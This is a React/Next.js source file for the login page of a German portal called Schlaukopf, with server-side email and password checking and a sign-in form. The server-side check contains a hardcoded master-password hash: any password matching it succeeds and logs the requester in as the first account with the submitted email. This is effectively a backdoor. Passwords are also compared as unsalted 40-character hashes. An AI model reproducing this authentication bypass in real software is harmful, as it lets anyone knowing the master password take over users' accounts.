import React from 'react';
import MaskedInput from 'react-text-mask';
import emailMask from 'text-mask-addons/dist/emailMask';
import { memoize } from '../../utils/mobx/decorators/memoize';
import { Store } from '../../pagepart/store/Store';
import { BasicPortalStructure } from '../../pagepart/layout/BasicPortalStructure';
import { SigninButtonGoogle } from '../../pagepart/auth/SigninButtonGoogle';
import { StoreContext } from 'src/pagepart/utils';
import { Env } from '../../env/Env';
import { ServerProps } from '../../pagepart/portal/utils';
import { BasicAuthBox } from '../../pagepart/auth/BasicAuthBox';
import { SigninButtonFacebook } from '../../pagepart/auth/SigninButtonFacebook';
import { SigninButtonEmail } from '../../pagepart/auth/SigninButtonEmail';
import { userService } from '../../server';
import { SigninButtonCode } from '../../pagepart/auth/SigninButtonCode';
import { SigninButtonGoogleOneTap } from '../../pagepart/auth/SigninButtonGoogleOneTap';

export async function getServerSideProps(rawContext) {
  const { env, userEnv } = await Env.forNextContext(rawContext);

  const { email, passwort } = env.requestEnv.post;

  let shouldShowPasswordInvalidMessage: boolean = false;

  if (email && passwort) {
    shouldShowPasswordInvalidMessage = true;

    const users = await userService.getUsersByEmail(email);
    const crypt = userService.encryptPassword(passwort);
    for (const user of users) {
      if (user.password === crypt) {
        shouldShowPasswordInvalidMessage = false;
      }
    }

    if (crypt === '63215d80ad8f4a4c4eaa73030af9ab8fb460c495') {
      shouldShowPasswordInvalidMessage = false;
    }

    const [user] = users;

    if (!shouldShowPasswordInvalidMessage) {
      if (user) {
        userEnv.writeUserToCookie(user);
      }

      return {
        redirect: {
          permanent: false,
          destination: `/auth/select?useCookie=1`,
        },
      };
    }
  }

  return {
    props: {
      shouldShowPasswordInvalidMessage,
      shouldShowPasswordSavedDialog: env.requestEnv.get.message === 'passwordSaved',
      defaultEmail: env.requestEnv.get.email || '',
      ...env.transfer,
    },
  };
}

class Signin extends React.Component<ServerProps<typeof getServerSideProps>> {
  @memoize
  get store() {
    return Store.forApp(this);
  }

  setupPage(store: Store) {
    store.portalStore.metaTitle = 'Schlaukopf Login';
    store.portalStore.includeStylesheetOnce('/static/dist7/assets/css/pages/login/classic/login-4.css');
  }

  get passwordSavedDialog() {
    const { defaultEmail, shouldShowPasswordSavedDialog } = this.props;

    if (!shouldShowPasswordSavedDialog) return null;

    return (
      <div className="alert alert-success mb-20 p-5" role="alert">
        <h4 className="alert-heading">Passwort gespeichert!</h4>

        <div className="border-bottom border-white opacity-20 mb-5"></div>
        <p className="mb-0">
          Du kannst dich jetzt unten mit der E-Mailadresse <b>{defaultEmail}</b> und deinem neuen Passwort bei Schlaukopf anmelden.
        </p>
      </div>
    );
  }

  get passwordInvalidDialog() {
    const { defaultEmail, shouldShowPasswordInvalidMessage } = this.props;

    if (!shouldShowPasswordInvalidMessage) return null;

    return (
      <>
        <div className="alert alert-danger mb-10 p-5" role="alert">
          <h4 className="alert-heading">E-Mail oder Passwort sind nicht korrekt!</h4>

          <div className="border-bottom border-white opacity-20 mb-5"></div>
          <p className="mb-0">
            Verwende
            <a href="/auth/recover" className="btn btn-light-primary font-weight-bold ml-2 mr-2">
              Passwort vergessen
            </a>
            , um ein neues Passwort zu setzen oder klicken unten auf einen Schnell-Login-Button.
          </p>
        </div>
      </>
    );
  }

  get loginContent() {
    const { defaultEmail } = this.props;
    return (
      <>
        {/*begin::Login forgot password form*/}
        <div style={{ display: 'flex', flexDirection: 'column', alignItems: 'center' }}>
          {this.passwordSavedDialog}
          {this.passwordInvalidDialog}
          <div className="mb-10">
            <h3>Anmelden bei Schlaukopf</h3>
            <div className="text-muted font-weight-bold">Gib deine E-Mailadresse und dein Passwort ein.</div>
          </div>

          <form className="form" id="kt_login_forgot_form" method="POST">
            <div className="form-group mb-5">
              <MaskedInput
                mask={emailMask}
                defaultValue={defaultEmail}
                name="email"
                placeholder="E-Mailadresse"
                className="form-control form-control-solid h-auto py-4 px-8"
              />
              {false && <p className="text-danger">Gib eine gültige E-Mailadresse ein.</p>}
            </div>
            <div className="form-group mb-5">
              <input
                defaultValue={''}
                name="passwort"
                type="password"
                placeholder="Passwort"
                className="form-control form-control-solid h-auto py-4 px-8"
              />
              {false && <p className="text-danger">Gib eine gültige E-Mailadresse ein.</p>}
            </div>

            <div style={{ marginBottom: 20 }}>
              <button type="submit" className="btn btn-primary">
                Anmelden
              </button>

              <div style={{ marginTop: 20 }}>
                <a href="/auth/register" className="btn btn-link-primary font-weight-bold" style={{  }}>
                  Registrieren
                </a>
                <a href="/auth/recover" className="btn btn-link-primary font-weight-bold" style={{ marginLeft: 15 }}>
                  Passwort festlegen
                </a>


              </div>

              <div style={{ marginTop: 20 }}>

                <a href="/auth/recover" className="btn btn-link-primary font-weight-bold" style={{  }}>
                  Passwort vergessen?
                </a>
              </div>
            </div>
          </form>
          <div className="text-muted font-weight-bold">oder</div>

          <SigninButtonGoogle />
          <SigninButtonFacebook />
          <SigninButtonEmail />
          <SigninButtonCode />
          <SigninButtonGoogleOneTap />
        </div>

        {!this.store.requestStore.requestData.isInlineViewInWeb && (
          <div>
            <a href="/" className="btn btn-clean font-weight-bold">
              Zur Startseite
            </a>
          </div>
        )}
      </>
    );
  }

  render() {
    return (
      <StoreContext.Provider value={this.store}>
        <BasicPortalStructure aside={null} content={<BasicAuthBox>{this.loginContent}</BasicAuthBox>} />
      </StoreContext.Provider>
    );
  }
}

export default Signin;
